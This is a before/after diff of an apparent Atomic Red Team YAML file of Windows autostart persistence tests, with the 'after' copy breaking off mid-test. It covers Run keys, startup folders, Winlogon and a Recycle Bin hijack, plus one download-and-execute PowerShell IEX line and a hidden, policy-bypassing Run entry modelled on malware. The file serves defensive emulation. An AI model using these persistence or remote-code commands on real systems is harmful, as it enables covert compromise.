atomics/T1547.001/T1547.001.yaml (before)
attack_technique: T1547.001
display_name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
atomic_tests:
- name: Reg Key Run
  auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05
  description: |
    Run Key Persistence

    Upon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout. 
  supported_platforms:
  - windows
  input_arguments:
    command_to_execute:
      description: Thing to Run
      type: Path
      default: C:\Path\AtomicRedTeam.exe
  executor:
    command: |
      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
    cleanup_command: |
      REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1
    name: command_prompt
- name: Reg Key RunOnce
  auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
  description: |
    RunOnce Key Persistence.

    Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. 
  supported_platforms:
  - windows
  input_arguments:
    thing_to_execute:
      description: Thing to Run
      type: Path
      default: C:\Path\AtomicRedTeam.dll
  executor:
    command: |
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
    cleanup_command: |
      REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: PowerShell Registry RunOnce
  auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42
  description: |
    RunOnce Key Persistence via PowerShell
    Upon successful execution, a new entry will be added to the runonce item in the registry.
  supported_platforms:
  - windows
  input_arguments:
    thing_to_execute:
      description: Thing to Run
      type: Path
      default: powershell.exe
    reg_key_path:
      description: Path to registry key to update
      type: Path
      default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce
  executor:
    command: |
      $RunOnceKey = "#{reg_key_path}"
      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
    cleanup_command: |
      Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
    name: powershell
    elevation_required: true
- name: Suspicious vbs file run from startup Folder
  auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5
  description: |
    vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. 
    Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    folder and will also run when the computer is restarted and the user logs in.
  supported_platforms:
  - windows
  executor:
    command: |
      Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
      Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
      cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
      cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
    cleanup_command: |
      Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
      Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
    name: powershell
    elevation_required: true
- name: Suspicious jse file run from startup Folder
  auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06
  description: |
    jse files can be placed in and ran from the startup folder to maintain persistance.
    Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. 
    Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    folder and will also run when the computer is restarted and the user logs in.
  supported_platforms:
  - windows
  executor:
    command: |
      Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
      Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
      cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
      cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
    cleanup_command: |
      Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore
      Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore
    name: powershell
    elevation_required: true
- name: Suspicious bat file run from startup Folder
  auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
  description: |
    bat files can be placed in and executed from the startup folder to maintain persistance.
    Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    folder and will also run when the computer is restarted and the user logs in.
  supported_platforms:
  - windows
  executor:
    command: |
      Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
      Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
      Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
      Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
    cleanup_command: |
      Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore
      Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore
    name: powershell
    elevation_required: true
    
- name: Add Executable Shortcut Link to User Startup Folder
  auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d
  description: 'Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. '
  supported_platforms:
  - windows
  executor:
    command: |-
      $Target = "C:\Windows\System32\calc.exe"
      $ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"
      $WScriptShell = New-Object -ComObject WScript.Shell
      $Create = $WScriptShell.CreateShortcut($ShortcutLocation)
      $Create.TargetPath = $Target
      $Create.Save()      
    cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
    name: powershell
    elevation_required: true 

- name: Add persistance via Recycle bin
  auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
  description: |
    Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
    User have to clic on the recycle bin to lauch the payload (here calc)
  supported_platforms:
  - windows
  executor:
    command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f  
    cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
    name: command_prompt

- name: SystemBC Malware-as-a-Service Registry
  auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891
  description: |
      This Atomic will create a registry key called socks5_powershell for persistance access
      https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
  supported_platforms:
  - windows
  input_arguments:
    reg_key_value:
      description: Thing to Run
      type: Path
      default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
    reg_key_path:
      description: Path to registry key to update
      type: Path
      default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
  executor:
    command: |
      $RunKey = "#{reg_key_path}"
      Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
    cleanup_command: |
      Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
    name: powershell
    
- name: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value
  auto_generated_guid: acfef903-7662-447e-a391-9c91c2f00f7b
  description: |
    This test will modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V "Common Startup" 
    value to point to a new startup folder where a payload could be stored to launch at boot.  *successful execution requires system restart
  supported_platforms:
  - windows
  input_arguments:
    new_startup_folder:
      description: new startup folder to replace standard one
      type: String
      default: $env:TMP\atomictest\
    payload:
      description: 'executable to be placed in new startup location '
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
    command: |
      New-Item -ItemType Directory -path "#{new_startup_folder}"
      Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
      Set-ItemProperty -Path  "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "#{new_startup_folder}"
    cleanup_command: |
      Set-ItemProperty -Path  "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"
      Remove-Item "#{new_startup_folder}" -Recurse -Force
    name: powershell
    elevation_required: true

- name: Change Startup Folder - HKCU Modify User Shell Folders Startup Value
  auto_generated_guid: 8834b65a-f808-4ece-ad7e-2acdf647aafa
  description: | 
    This test will modify the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders  -V "Startup" value 
    to point to a new startup folder where a payload could be stored to launch at boot.  *successful execution requires system restart
  supported_platforms:
  - windows
  input_arguments:
    new_startup_folder:
      description: new startup folder to replace standard one
      type: String
      default: $env:TMP\atomictest\
    payload:
      description: 'executable to be placed in new startup location '
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
    command: | 
        New-Item -ItemType Directory -path "#{new_startup_folder}"
        Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
        Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}"
    cleanup_command: |
        Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        Remove-Item "#{new_startup_folder}" -Recurse -Force
    name: powershell

- name: HKCU - Policy Settings Explorer Run Key
  auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
  description: | 
    This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run to launch calc.exe on boot. 
    *Requires reboot
  supported_platforms:
  - windows
  input_arguments:
    target_key_value_name:
      description: registry value to crate on target key
      type: string
      default: atomictest
    payload:
      description: 'payload to execute'
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
    command: |
      if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
        New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
      }
      Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
    cleanup_command: Remove-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}"
    name: powershell
    elevation_required: true

- name: HKLM - Policy Settings Explorer Run Key
  auto_generated_guid: b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f
  description: | 
    This test will create a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run key value to launch calc.exe on boot. 
    *Requires reboot
  supported_platforms:
  - windows
  input_arguments:
    target_key_value_name:
      description: registry value to crate on target key
      type: string
      default: atomictest
    payload:
      description: 'payload to execute'
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
    command: |
      if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
        New-Item -ItemType Key -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
      }
      Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
    cleanup_command: Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}"
    name: powershell
    elevation_required: true

- name: HKLM - Append Command to Winlogon Userinit KEY Value
  auto_generated_guid: f7fab6cc-8ece-4ca7-a0f1-30a22fccd374
  description: | 
    This test will append a command to the  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value to launch calc.exe on boot.
    * Requires reboot
  supported_platforms:
  - windows
  input_arguments:
    payload:
      description: what to run
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
    command: |
      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit");
      Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit-backup" -Value "$oldvalue";
      $newvalue = $oldvalue + " #{payload}";
      Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$newvalue"
    cleanup_command: |-
      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup');
      Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$oldvalue";
      Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup'
    name: powershell
    elevation_required: true

- name: 'HKLM - Modify default System Shell - Winlogon Shell KEY Value '
  auto_generated_guid: 1d958c61-09c6-4d9e-b26b-4130314e520e
  description: | 
    This test change the default value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell from "explorer.exe" to the full path of "C:\Windows\explorer.exe" 
    to log a change to the key's default value without breaking boot sequence. 
    An atacker will alternatively replace this with a custom shell. 
  supported_platforms:
  - windows
  input_arguments:
    payload:
      description: what to run
      type: String
      default: C:\Windows\explorer.exe
  executor:
    command: |
      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell");
      Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell-backup" -Value "$oldvalue";
      $newvalue = $oldvalue + ", #{payload}";
      Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$newvalue"
    cleanup_command: |-
      $oldvalue = $(Get-ItemPropertyValue -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup');
      Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$oldvalue";
      Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
    name: powershell
    elevation_required: true

atomics/T1547.001/T1547.001.yaml (after)
attack_technique: T1547.001
display_name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
atomic_tests:
- name: Reg Key Run
  auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05
  description: |
    Run Key Persistence

    Upon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout. 
  supported_platforms:
  - windows
  input_arguments:
    command_to_execute:
      description: Thing to Run
      type: Path
      default: C:\Path\AtomicRedTeam.exe
  executor:
    command: |
      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
    cleanup_command: |
      REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1
    name: command_prompt
- name: Reg Key RunOnce
  auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
  description: |
    RunOnce Key Persistence.

    Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. 
  supported_platforms:
  - windows
  input_arguments:
    thing_to_execute:
      description: Thing to Run
      type: Path
      default: C:\Path\AtomicRedTeam.dll
  executor:
    command: |
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
    cleanup_command: |
      REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: PowerShell Registry RunOnce
  auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42
  description: |
    RunOnce Key Persistence via PowerShell
    Upon successful execution, a new entry will be added to the runonce item in the registry.
  supported_platforms:
  - windows
  input_arguments:
    thing_to_execute:
      description: Thing to Run
      type: Path
      default: powershell.exe
    reg_key_path:
      description: Path to registry key to update
      type: Path
      default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce
  executor:
    command: |
      $RunOnceKey = "#{reg_key_path}"
      set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
    cleanup_command: |
      Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
    name: powershell
    elevation_required: true
- name: Suspicious vbs file run from startup Folder
  auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5
  description: |
    vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. 
    Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    folder and will also run when the computer is restarted and the user logs in.
  supported_platforms:
  - windows
  executor:
    command: |
      Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
      Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
      cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
      cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
    cleanup_command: |
      Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
      Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
    name: powershell
    elevation_required: true
- name: Suspicious jse file run from startup Folder
  auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06
  description: |
    jse files can be placed in and ran from the startup folder to maintain persistance.
    Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. 
    Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    folder and will also run when the computer is restarted and the user logs in.
  supported_platforms:
  - windows
  executor:
    command: |
      Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
      Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
      cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
      cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
    cleanup_command: |
      Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore
      Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore
    name: powershell
    elevation_required: true
- name: Suspicious bat file run from startup Folder
  auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
  description: |
    bat files can be placed in and executed from the startup folder to maintain persistance.
    Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
    folder and will also run when the computer is restarted and the user logs in.
  supported_platforms:
  - windows
  executor:
    command: |
      Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
      Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
      Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
      Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
    cleanup_command: |
      Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore
      Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore
    name: powershell
    elevation_required: true
    
- name: Add Executable Shortcut Link to User Startup Folder
  auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d
  description: 'Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. '
  supported_platforms:
  - windows
  executor:
    command: |-
      $Target = "C:\Windows\System32\calc.exe"
      $ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"
      $WScriptShell = New-Object -ComObject WScript.Shell
      $Create = $WScriptShell.CreateShortcut($ShortcutLocation)
      $Create.TargetPath = $Target
      $Create.Save()      
    cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
    name: powershell
    elevation_required: true 

- name: Add persistance via Recycle bin
  auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
  description: |
    Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
    User have to clic on the recycle bin to lauch the payload (here calc)
  supported_platforms:
  - windows
  executor:
    command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f  
    cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
    name: command_prompt

- name: SystemBC Malware-as-a-Service Registry
  auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891
  description: |
      This Atomic will create a registry key called socks5_powershell for persistance access
      https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
  supported_platforms:
  - windows
  input_arguments:
    reg_key_value:
      description: Thing to Run
      type: Path
      default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
    reg_key_path:
      description: Path to registry key to update
      type: Path
      default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
  executor:
    command: |
      $RunKey = "#{reg_key_path}"
      Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
    cleanup_command: |
      Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
    name: powershell
    
- name: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value
  auto_generated_guid: acfef903-7662-447e-a391-9c91c2f00f7b
  description: |
    This test will modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V "Common Startup" 
    value to point to a new startup folder where a payload could be stored to launch at boot.  *successful execution requires system restart
  supported_platforms:
  - windows
  input_arguments:
    new_startup_folder:
      description: new startup folder to replace standard one
      type: String
      default: $env:TMP\atomictest\
    payload:
      description: 'executable to be placed in new startup location '
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
    command: |
      New-Item -ItemType Directory -path "#{new_startup_folder}"
      Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
      Set-ItemProperty -Path  "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "#{new_startup_folder}"
    cleanup_command: |
      Set-ItemProperty -Path  "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"
      Remove-Item "#{new_startup_folder}" -Recurse -Force
    name: powershell
    elevation_required: true

- name: Change Startup Folder - HKCU Modify User Shell Folders Startup Value
  auto_generated_guid: 8834b65a-f808-4ece-ad7e-2acdf647aafa
  description: | 
    This test will modify the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders  -V "Startup" value 
    to point to a new startup folder where a payload could be stored to launch at boot.  *successful execution requires system restart
  supported_platforms:
  - windows
  input_arguments:
    new_startup_folder:
      description: new startup folder to replace standard one
      type: String
      default: $env:TMP\atomictest\
    payload:
      description: 'executable to be placed in new startup location '
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
    command: | 
        New-Item -ItemType Directory -path "#{new_startup_folder}"
        Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
        Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}"
    cleanup_command: |
        Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        Remove-Item "#{new_startup_folder}" -Recurse -Force
    name: powershell

- name: HKCU - Policy Settings Explorer Run Key
  auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
  description: | 
    This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run to launch calc.exe on boot. 
    *Requires reboot
  supported_platforms:
  - windows
  input_arguments:
    target_key_value_name:
      description: registry value to crate on target key
      type: string
      default: atomictest
    payload:
      description: 'payload to execute'
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
    command: |
      if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
        New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
      }
      Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
    cleanup_command: Remove-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}"
    name: powershell
    elevation_required: true

- name: HKLM - Policy Settings Explorer Run Key
  auto_generated_guid: b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f
  description: | 
    This test will create a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run key value to launch calc.exe on boot. 
    *Requires reboot
  supported_platforms:
  - windows
  input_arguments:
    target_key_value_name:
      description: registry value to crate on target key
      type: string
      default: atomictest
    payload:
      description: 'payload to execute'
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
    command: |
      if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
        New-Item -ItemType Key -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
      }
      Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
    cleanup_command: Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}"
    name: powershell
    elevation_required: true

- name: HKLM - Append Command to Winlogon Userinit KEY Value
  auto_generated_guid: f7fab6cc-8ece-4ca7-a0f1-30a22fccd374
  description: | 
    This test will append a command to the  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value to launch calc.exe on boot.
    * Requires reboot
  supported_platforms:
  - windows
  input_arguments:
    payload:
      description: what to run
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
    command: |
